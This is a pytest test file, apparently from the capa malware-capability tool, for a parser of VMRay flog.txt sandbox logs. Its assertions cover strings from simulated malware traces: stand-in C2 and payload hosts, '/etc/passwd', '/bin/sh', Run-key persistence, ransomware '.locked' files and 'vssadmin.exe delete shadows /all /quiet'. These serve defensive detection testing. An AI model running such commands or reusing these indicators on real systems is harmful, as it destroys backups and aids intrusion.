    path = tmp_path / "flog.txt"
    path.write_bytes(
        b"# Flog Txt Version 1\n\n"
        b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n'
        b'image_name = "sample"\nfilename = "x.exe"\ncmd_line = ""\nmonitor_reason = "a"\n\n'
        b'Thread:\nid = "1"\nos_tid = "0x2000"\n'
        b' [0001.000] CreateFile (lpFileName="test.exe", dwDesiredAccess=0x80000000) returned 0x4\n'
        b" [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n"
        b" [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n"
    )
    flog = flog_txt.parse_flog_txt_path(path)
    calls = flog.analysis.function_calls

    # CreateFile: string param and numeric param
    create_file = calls[0]
    assert create_file.name == "CreateFile"
    assert create_file.params_in is not None
    params = {p.name: p for p in create_file.params_in.params}
    assert "lpFileName" in params
    # string values land in the deref, mirroring VMRay's XML representation
    assert params["lpFileName"].deref is not None
    assert params["lpFileName"].deref.value == "test.exe"
    assert "dwDesiredAccess" in params
    assert params["dwDesiredAccess"].value == "0x80000000"

    # VirtualAlloc: two numeric params
    virtual_alloc = calls[1]
    assert virtual_alloc.params_in is not None
    va_params = {p.name: p for p in virtual_alloc.params_in.params}
    assert va_params["lpAddress"].value == "0x0"
    assert va_params["dwSize"].value == "4096"

    # no-arg call: params_in should be None
    get_proc = calls[2]
    assert get_proc.name == "GetCurrentProcess"
    assert get_proc.params_in is None


# ---------------------------------------------------------------------------
# Fixture-based feature-presence tests
# ---------------------------------------------------------------------------
# These tests load the realistic flog.txt fixtures from tests/fixtures/vmray/flog_txt/
# and verify that the extractor yields the expected capa features. They act as
# regression tests for the parser — especially the string-argument parsing path,
# which is brittle — and mirror the pattern used by test_vmray_features.py.


def _collect_all_call_features(ext: VMRayExtractor) -> set:
    """Collect every feature emitted at the call scope across all processes."""
    features = set()
    for ph in ext.get_processes():
        for th in ext.get_threads(ph):
            for ch in ext.get_calls(ph, th):
                for feature, addr in ext.extract_call_features(ph, th, ch):
                    features.add(feature)
    return features


def _collect_call_features_for_process(ext: VMRayExtractor, image_name: str) -> set:
    """Collect call-scope features only for the process whose image_name matches."""
    features = set()
    for ph in ext.get_processes():
        if ph.inner.image_name != image_name:
            continue
        for th in ext.get_threads(ph):
            for ch in ext.get_calls(ph, th):
                for feature, addr in ext.extract_call_features(ph, th, ch):
                    features.add(feature)
    return features


# --- windows_apis.flog.txt ---------------------------------------------------


@pytest.fixture(scope="module")
def windows_apis_extractor():
    """Module-scoped extractor over the Windows-API fixture (parsed once per module)."""
    path = FLOG_TXT_FIXTURES / "windows_apis.flog.txt"
    return VMRayExtractor.from_flog_txt(path)


def test_windows_flog_txt_process_count(windows_apis_extractor):
    """Two processes are described in windows_apis.flog.txt."""
    procs = list(windows_apis_extractor.get_processes())
    assert len(procs) == 2


def test_windows_flog_txt_api_features(windows_apis_extractor):
    """Common Win32 API names are yielded as API features."""
    features = _collect_all_call_features(windows_apis_extractor)
    for api_name in (
        "CreateFileW",
        "RegOpenKeyExW",
        "InternetOpenW",
        "InternetConnectW",
        "VirtualAlloc",
        "CreateMutexW",
        "LoadLibraryW",
        "CreateProcessW",
        "HttpOpenRequestW",
        "WinHttpConnect",
        "GetAddrInfoW",
        "GetComputerNameW",
    ):
        assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found"


def test_windows_flog_txt_string_args(windows_apis_extractor):
    """String arguments are extracted and backslash-escaping is correctly unwound."""
    features = _collect_all_call_features(windows_apis_extractor)
    for expected_string in (
        # CreateFileW lpFileName (double-backslash in flog → single backslash in feature)
        "C:\\Users\\test\\Documents\\config.ini",
        # RegOpenKeyExW lpSubKey
        "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
        # InternetOpenW lpszAgent
        "Mozilla/5.0 (Windows NT 10.0)",
        # InternetConnectW lpszServerName
        "evil.example.com",
        # CreateMutexW lpName
        "Global\\MyMutex12345",
        # LoadLibraryW lpLibFileName
        "kernel32.dll",
        # HttpOpenRequestW verb and path
        "GET",
        "/beacon",
        # WinHttpConnect pswzServerName
        "c2.example.org",
        # WinHttpOpenRequest verb
        "POST",
        # GetComputerNameW result (child process)
        "DESKTOP-TEST01",
    ):
        assert capa.features.common.String(expected_string) in features, f"String({expected_string!r}) not found"


def test_windows_flog_txt_string_double_backslash_absent(windows_apis_extractor):
    """Double-escaped backslashes (as they appear in the raw flog.txt) must NOT appear in features."""
    features = _collect_all_call_features(windows_apis_extractor)
    # The raw flog.txt content has C:\\Users\\...; the extractor must normalise to single backslash
    assert capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") not in features


def test_windows_flog_txt_number_args(windows_apis_extractor):
    """Numeric arguments are extracted as Number features."""
    features = _collect_all_call_features(windows_apis_extractor)
    # VirtualAlloc dwSize
    assert capa.features.insn.Number(4096) in features
    # VirtualAlloc flAllocationType
    assert capa.features.insn.Number(0x3000) in features
    # VirtualAlloc flProtect
    assert capa.features.insn.Number(0x40) in features
    # CreateFileW dwDesiredAccess
    assert capa.features.insn.Number(0x80000000) in features


def test_windows_flog_txt_child_process(windows_apis_extractor):
    """The spawned child process (cmd.exe) is present and has its own API calls."""
    features = _collect_call_features_for_process(windows_apis_extractor, "cmd.exe")
    assert capa.features.insn.API("NtQueryInformationProcess") in features
    assert capa.features.insn.API("GetUserNameW") in features
    # GetUserNameW lpBuffer string
    assert capa.features.common.String("test") in features


# --- linux_syscalls.flog.txt -------------------------------------------------


@pytest.fixture(scope="module")
def linux_syscalls_extractor():
    """Module-scoped extractor over the Linux syscall fixture."""
    path = FLOG_TXT_FIXTURES / "linux_syscalls.flog.txt"
    return VMRayExtractor.from_flog_txt(path)


def test_linux_flog_txt_sys_prefix_stripped(linux_syscalls_extractor):
    """sys_ prefix is stripped from all Linux syscall names."""
    features = _collect_all_call_features(linux_syscalls_extractor)
    # Every syscall name should appear WITHOUT the sys_ prefix
    for stripped_name in (
        "read",
        "write",
        "open",
        "connect",
        "socket",
        "execve",
        "fork",
        "getuid",
        "setuid",
        "chmod",
        "unlink",
        "time",
        "ptrace",
        "prctl",
        "mmap",
        "mprotect",
        "munmap",
        "bind",
        "listen",
        "accept",
        "sendto",
        "recvfrom",
    ):
        assert capa.features.insn.API(stripped_name) in features, f"API({stripped_name!r}) not found after stripping"


def test_linux_flog_txt_sys_prefix_not_present(linux_syscalls_extractor):
    """sys_-prefixed names must NOT appear in features (only the stripped form)."""
    features = _collect_all_call_features(linux_syscalls_extractor)
    assert capa.features.insn.API("sys_open") not in features
    assert capa.features.insn.API("sys_execve") not in features


def test_linux_flog_txt_string_args(linux_syscalls_extractor):
    """String path arguments from Linux syscalls are extracted correctly."""
    features = _collect_all_call_features(linux_syscalls_extractor)
    assert capa.features.common.String("/etc/passwd") in features
    assert capa.features.common.String("/bin/sh") in features
    assert capa.features.common.String("/tmp/backdoor") in features
    assert capa.features.common.String("/tmp/.hidden") in features


# --- string_edge_cases.flog.txt -----------------------------------------------


@pytest.fixture(scope="module")
def string_edge_cases_extractor():
    """Module-scoped extractor over the string edge-case fixture."""
    path = FLOG_TXT_FIXTURES / "string_edge_cases.flog.txt"
    return VMRayExtractor.from_flog_txt(path)


def test_edge_case_paths_with_spaces(string_edge_cases_extractor):
    """File paths containing spaces are parsed correctly."""
    features = _collect_all_call_features(string_edge_cases_extractor)
    assert capa.features.common.String("C:\\path with spaces\\file name.txt") in features


def test_edge_case_unc_path(string_edge_cases_extractor):
    """UNC paths (\\server\\share) are parsed correctly."""
    features = _collect_all_call_features(string_edge_cases_extractor)
    assert capa.features.common.String("\\\\server\\share\\document.docx") in features


def test_edge_case_url_string(string_edge_cases_extractor):
    """Full URL strings are preserved as-is."""
    features = _collect_all_call_features(string_edge_cases_extractor)
    assert capa.features.common.String("https://c2.example.com/payload.bin") in features


def test_edge_case_registry_key(string_edge_cases_extractor):
    """Registry key paths are normalised to single backslashes."""
    features = _collect_all_call_features(string_edge_cases_extractor)
    assert capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") in features


def test_edge_case_numeric_args(string_edge_cases_extractor):
    """Numeric arguments from edge-case calls are extracted."""
    features = _collect_all_call_features(string_edge_cases_extractor)
    # send() len=256
    assert capa.features.insn.Number(256) in features
    # recv() len=4096
    assert capa.features.insn.Number(4096) in features
    # WriteProcessMemory nSize=4096
    assert capa.features.insn.Number(4096) in features


# ---------------------------------------------------------------------------
# _parse_hex_or_decimal parametric tests
# ---------------------------------------------------------------------------


@pytest.mark.parametrize(
    "raw, expected",
    [
        ("0", 0),
        ("1", 1),
        ("255", 255),
        ("4294967295", 4294967295),
        ("0x0", 0),
        ("0xff", 255),
        ("0xFF", 255),
        ("0xDEADbeef", 0xDEADBEEF),
        ("0xffffffffffffffff", 0xFFFFFFFFFFFFFFFF),
        ("0x80070005", 0x80070005),
        # leading/trailing whitespace is stripped
        ("  0x10  ", 0x10),
        # quoted values are unquoted before parsing
        ('"0x20"', 0x20),
        # empty string → 0
        ("", 0),
        # negative decimal (Python int() accepts it)
        ("-1", -1),
    ],
)
def test_parse_hex_or_decimal_valid(raw, expected):
    """Hex (0x-prefixed, any case) and decimal values parse to the expected int."""
    assert _parse_hex_or_decimal(raw) == expected


@pytest.mark.parametrize("raw", ["NULL", "TRUE", "FALSE", "INVALID_HANDLE_VALUE", "abc"])
def test_parse_hex_or_decimal_invalid_raises(raw):
    """Symbolic constants and non-numeric text raise rather than parse silently."""
    with pytest.raises((ValueError, TypeError)):
        _parse_hex_or_decimal(raw)


# ---------------------------------------------------------------------------
# _parse_event parametric tests
# ---------------------------------------------------------------------------


@pytest.mark.parametrize(
    "line, expected_api, expected_rv",
    [
        # basic no-arg call with hex return value
        ("[0072.750] GetCurrentProcess () returned 0xffffffffffffffff", "GetCurrentProcess", 0xFFFFFFFFFFFFFFFF),
        # uppercase hex return value (mixed case)
        ("[0001.000] GetCurrentProcess () returned 0xFFFFFFFF", "GetCurrentProcess", 0xFFFFFFFF),
        # HRESULT-style error code
        ("[0001.010] DeleteFileW () returned 0x80070005", "DeleteFileW", 0x80070005),
        # no return value at all (line ends after closing paren)
        ("[0083.567] CoTaskMemFree (pv=0x746aa0)", "CoTaskMemFree", None),
        # decimal return value
        ("[0001.003] ExitProcess (uExitCode=0) returned 0", "ExitProcess", 0),
        # leading zeros in timestamp major/minor
        ("[0001.000] NtCreateFile () returned 0x0", "NtCreateFile", 0),
        # large timestamp
        ("[9999.999] LongRunningOp () returned 0x1", "LongRunningOp", 1),
    ],
)
def test_parse_event_valid(line, expected_api, expected_rv):
    """Well-formed event lines yield (api_name, args, return_value)."""
    result = _parse_event(line)
    assert result is not None
    api_name, _args, rv = result
    assert api_name == expected_api
    assert rv == expected_rv


@pytest.mark.parametrize(
    "line",
    [
        # does not start with '['
        "GetCurrentProcess () returned 0x1",
        # comment / header line
        "# Flog Txt Version 1",
        # blank line
        "",
        # property line (key = value)
        'id = "1"',
        # bracket never closed
        "[0001.000 GetCurrentProcess () returned 0x1",
        # section header
        "Process:",
        "Thread:",
        "Region:",
    ],
)
def test_parse_event_rejects_non_event_lines(line):
    """Non-event lines (headers, properties, malformed brackets) return None."""
    assert _parse_event(line) is None


# ---------------------------------------------------------------------------
# _parse_args parametric tests
# ---------------------------------------------------------------------------


@pytest.mark.parametrize(
    "args_str, expected_names",
    [
        # empty / whitespace-only → None
        ("", None),
        ("   ", None),
        # only symbolic constants (NULL, TRUE) → no parseable params → None
        ("lpszProxyName=NULL, lpszProxyBypass=NULL", None),
        # string arg only
        ('lpszAgent="WinInet"', ["lpszAgent"]),
        # numeric hex arg
        ("dwDesiredAccess=0x80000000", ["dwDesiredAccess"]),
        # numeric decimal arg
        ("dwLen=16", ["dwLen"]),
        # mixed: string + hex + decimal + symbolic (symbolic skipped)
        ('lpFileName="test.exe", dwAccess=0x80000000, count=4096, hTemplate=NULL', ["lpFileName", "dwAccess", "count"]),
        # mixed-case hex is accepted
        ("addr=0xDEADbeef", ["addr"]),
    ],
)
def test_parse_args_param_names(args_str, expected_names):
    """Parseable parameters keep their names in order; unparseable input yields None."""
    result = _parse_args(args_str)
    if expected_names is None:
        assert result is None
    else:
        assert result is not None
        names = [p.name for p in result.params]
        assert names == expected_names


def test_parse_args_string_value_stored_in_deref():
    """A quoted string argument becomes a void_ptr param whose deref holds the str."""
    result = _parse_args('lpFileName="hello.txt"')
    assert result is not None
    assert len(result.params) == 1
    p = result.params[0]
    assert p.type_ == "void_ptr"
    assert p.deref is not None
    assert p.deref.type_ == "str"
    assert p.deref.value == "hello.txt"


def test_parse_args_numeric_type():
    """Numeric arguments (decimal or hex) become unsigned_32bit params with raw values."""
    result = _parse_args("dwSize=4096, hKey=0x80000001")
    assert result is not None
    names = {p.name: p for p in result.params}
    assert names["dwSize"].type_ == "unsigned_32bit"
    assert names["dwSize"].value == "4096"
    assert names["hKey"].type_ == "unsigned_32bit"
    assert names["hKey"].value == "0x80000001"


# ---------------------------------------------------------------------------
# Malformed-input resilience tests
# ---------------------------------------------------------------------------


# Reusable byte-string building blocks for synthesizing flog.txt documents.
_HEADER = b"# Flog Txt Version 1\n\n"
_PROCESS_HEADER = (
    b"Process:\n"
    b'id = "1"\n'
    b'os_pid = "0x1000"\n'
    b'parent_id = "0"\n'
    b'os_parent_pid = "0"\n'
    b'image_name = "sample.exe"\n'
    b'filename = "sample.exe"\n'
    b'cmd_line = ""\n'
    b'monitor_reason = "analysis_target"\n\n'
)
_THREAD_HEADER = b'Thread:\nid = "1"\nos_tid = "0x2000"\n'


@pytest.mark.parametrize(
    "extra_lines",
    [
        # completely garbled event lines are silently skipped
        b"not a valid event line\n",
        b"[broken bracket\n",
        b"[0001.000 missing closing bracket] Func () returned 0x1\n",
        # comment inside thread block is skipped
        b"# stray comment\n [0001.000] GetCurrentProcess () returned 0x1\n",
        # blank lines inside thread block
        b"\n\n [0001.000] GetCurrentProcess () returned 0x1\n",
    ],
)
def test_malformed_event_lines_do_not_crash(tmp_path, extra_lines):
    """Garbled lines inside a thread block are skipped without raising."""
    path = tmp_path / "flog.txt"
    path.write_bytes(_HEADER + _PROCESS_HEADER + _THREAD_HEADER + extra_lines)
    flog = flog_txt.parse_flog_txt_path(path)
    assert flog.analysis.log_version == "1"


def test_process_block_without_thread_is_skipped(tmp_path):
    """A Process block missing required fields / thread data is dropped entirely."""
    path = tmp_path / "flog.txt"
    path.write_bytes(_HEADER + b"Process:\n" + b'id = "1"\nos_pid = "0x1000"\nimage_name = "x.exe"\n')
    flog = flog_txt.parse_flog_txt_path(path)
    assert len(flog.analysis.monitor_processes) == 0


def test_bom_prefix_is_accepted(tmp_path):
    """A UTF-8 BOM before the header does not prevent parsing."""
    path = tmp_path / "flog.txt"
    path.write_bytes(b"\xef\xbb\xbf" + _HEADER + _PROCESS_HEADER + _THREAD_HEADER)
    flog = flog_txt.parse_flog_txt_path(path)
    assert len(flog.analysis.monitor_processes) == 1


# ---------------------------------------------------------------------------
# format_variance.flog.txt — real-world format diversity fixture
# ---------------------------------------------------------------------------
# This fixture exercises: zero-padded hex IDs, decimal-only arguments alongside
# symbolic constants, mixed-case hex return values, multiple threads in one
# process, HRESULT-style error codes as return values, and no-return-value calls.


@pytest.fixture(scope="module")
def format_variance_extractor():
    """Module-scoped extractor over the format-variance fixture."""
    path = FLOG_TXT_FIXTURES / "format_variance.flog.txt"
    return VMRayExtractor.from_flog_txt(path)


def test_format_variance_process_and_thread_count(format_variance_extractor):
    """Two processes; thread counts per process are {2, 1}."""
    procs = list(format_variance_extractor.get_processes())
    assert len(procs) == 2
    thread_counts = [len(list(format_variance_extractor.get_threads(p))) for p in procs]
    # first process has two threads, second has one
    assert sorted(thread_counts) == [1, 2]


def test_format_variance_leading_zero_pid_parsed(format_variance_extractor):
    """Zero-padded hex os_pid values parse to the expected integer."""
    procs = list(format_variance_extractor.get_processes())
    pids = {p.inner.pid for p in procs}
    # os_pid = "0x00000ABC" → 0xABC = 2748
    assert 0xABC in pids


def test_format_variance_api_features(format_variance_extractor):
    """The full set of ransomware-style APIs in the fixture yields API features."""
    features = _collect_all_call_features(format_variance_extractor)
    for api_name in (
        "CreateFileW",
        "ReadFile",
        "WriteFile",
        "MoveFileExW",
        "RegOpenKeyExW",
        "RegSetValueExW",
        "CryptAcquireContextW",
        "CryptGenRandom",
        "CryptEncrypt",
        "InternetOpenW",
        "InternetOpenUrlW",
        "CreateProcessW",
        "FindFirstFileW",
        "FindNextFileW",
        "NtQuerySystemInformation",
        "OpenProcess",
        "CloseHandle",
        "WaitForSingleObject",
        "ExitProcess",
    ):
        assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found"


def test_format_variance_string_args(format_variance_extractor):
    """String arguments across the fixture (paths, URLs, command lines) are extracted."""
    features = _collect_all_call_features(format_variance_extractor)
    for expected in (
        "C:\\Users\\victim\\Documents\\important.docx",
        "C:\\Users\\victim\\Documents\\important.docx.locked",
        "C:\\Users\\victim\\Documents\\spreadsheet.xlsx",
        "C:\\Users\\victim\\Documents\\spreadsheet.xlsx.locked",
        "C:\\Users\\victim\\README_DECRYPT.txt",
        "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
        "WindowsDefender",
        "C:\\Users\\victim\\Desktop\\ransomware.exe",
        "Mozilla/4.0 (compatible; MSIE 8.0)",
        "http://ransom.example.com/key?id=ABCDEF0123456789",
        "vssadmin.exe delete shadows /all /quiet",
    ):
        assert capa.features.common.String(expected) in features, f"String({expected!r}) not found"


def test_format_variance_decimal_only_numeric_args(format_variance_extractor):
    """Decimal (non-hex) numeric arguments are extracted as Number features."""
    features = _collect_all_call_features(format_variance_extractor)
    # RegOpenKeyExW: hKey=2147483650 (decimal), ulOptions=0, samDesired=131097 (decimal)
    assert capa.features.insn.Number(2147483650) in features
    assert capa.features.insn.Number(131097) in features
    # CryptAcquireContextW: dwProvType=24 (decimal)
    assert capa.features.insn.Number(24) in features
    # WaitForSingleObject: dwMilliseconds=4294967295 (decimal INFINITE)
    assert capa.features.insn.Number(4294967295) in features


def test_format_variance_mixed_case_hex_args(format_variance_extractor):
    """Uppercase hex digits in arguments are parsed correctly."""
    features = _collect_all_call_features(format_variance_extractor)
    # CryptAcquireContextW dwFlags=0xF0000000 (uppercase hex digits in fixture)
    assert capa.features.insn.Number(0xF0000000) in features


def test_format_variance_no_returnvalue_calls_parsed(format_variance_extractor):
    """Calls without a 'returned' clause still yield API features."""
    features = _collect_all_call_features(format_variance_extractor)
    # CoTaskMemFree and GetSystemInfo have no "returned" clause in the fixture
    assert capa.features.insn.API("CoTaskMemFree") in features
    assert capa.features.insn.API("GetSystemInfo") in features


def test_format_variance_child_process_present(format_variance_extractor):
    """The spawned vssadmin.exe child process has its own API calls."""
    features = _collect_call_features_for_process(format_variance_extractor, "vssadmin.exe")
    assert capa.features.insn.API("NtQuerySystemInformation") in features
    assert capa.features.insn.API("OpenProcess") in features


# ---------------------------------------------------------------------------
# crlf_endings.flog.txt — Windows CRLF line endings
# ---------------------------------------------------------------------------


@pytest.fixture(scope="module")
def crlf_extractor():
    """Module-scoped extractor over the CRLF-line-ending fixture."""
    path = FLOG_TXT_FIXTURES / "crlf_endings.flog.txt"
    return VMRayExtractor.from_flog_txt(path)


def test_crlf_process_parsed(crlf_extractor):
    """CRLF line endings do not break process-block parsing."""
    procs = list(crlf_extractor.get_processes())
    assert len(procs) == 1
    assert procs[0].inner.image_name == "downloader.exe"


def test_crlf_api_features(crlf_extractor):
    """Downloader-style WinInet APIs are extracted despite CRLF endings."""
    features = _collect_all_call_features(crlf_extractor)
    for api_name in (
        "InternetOpenA",
        "InternetConnectA",
        "HttpOpenRequestA",
        "HttpSendRequestA",
        "InternetReadFile",
        "CreateFileA",
        "WriteFile",
        "WinExec",
    ):
        assert capa.features.insn.API(api_name) in features, f"API({api_name!r}) not found"


def test_crlf_string_args(crlf_extractor):
    """String arguments survive CRLF endings without trailing \\r contamination."""
    features = _collect_all_call_features(crlf_extractor)
    assert capa.features.common.String("WinInet") in features
    assert capa.features.common.String("payload.example.com") in features
    assert capa.features.common.String("GET") in features
    assert capa.features.common.String("/stage2.bin") in features
    assert capa.features.common.String("C:\\Windows\\Temp\\svchost32.exe") in features


# ---------------------------------------------------------------------------
# Round-trip test: parse → extract features → verify counts and spot-checks
# ---------------------------------------------------------------------------


def test_round_trip_feature_count(tmp_path):
    """End-to-end: write a flog.txt, build an extractor, spot-check yielded features."""
    path = tmp_path / "flog.txt"
    path.write_bytes(
        b"# Flog Txt Version 1\n\n"
        b"Process:\n"
        b'id = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n'
        b'image_name = "sample.exe"\nfilename = "sample.exe"\ncmd_line = ""\n'
        b'monitor_reason = "analysis_target"\n\n'
        b"Thread:\n"
        b'id = "1"\nos_tid = "0x2000"\n'
        b' [0001.000] CreateFileW (lpFileName="secret.txt", dwDesiredAccess=0x80000000) returned 0x4\n'
        b" [0001.001] ReadFile (hFile=0x4, lpBuffer=0x5000, nNumberOfBytesToRead=512) returned 0x1\n"
        b" [0001.002] CloseHandle (hObject=0x4) returned 0x1\n"
        b" [0001.003] GetCurrentProcess () returned 0xffffffffffffffff\n"
    )
    ext = VMRayExtractor.from_flog_txt(path)
    procs = list(ext.get_processes())
    assert len(procs) == 1

    threads = list(ext.get_threads(procs[0]))
    assert len(threads) == 1

    calls = list(ext.get_calls(procs[0], threads[0]))
    assert len(calls) == 4

    features = _collect_all_call_features(ext)

    # spot-check: API names
    assert capa.features.insn.API("CreateFileW") in features
    assert capa.features.insn.API("ReadFile") in features
    assert capa.features.insn.API("CloseHandle") in features
    assert capa.features.insn.API("GetCurrentProcess") in features

    # spot-check: string arg from CreateFileW
    assert capa.features.common.String("secret.txt") in features

    # spot-check: numeric args
    assert capa.features.insn.Number(0x80000000) in features
    assert capa.features.insn.Number(512) in features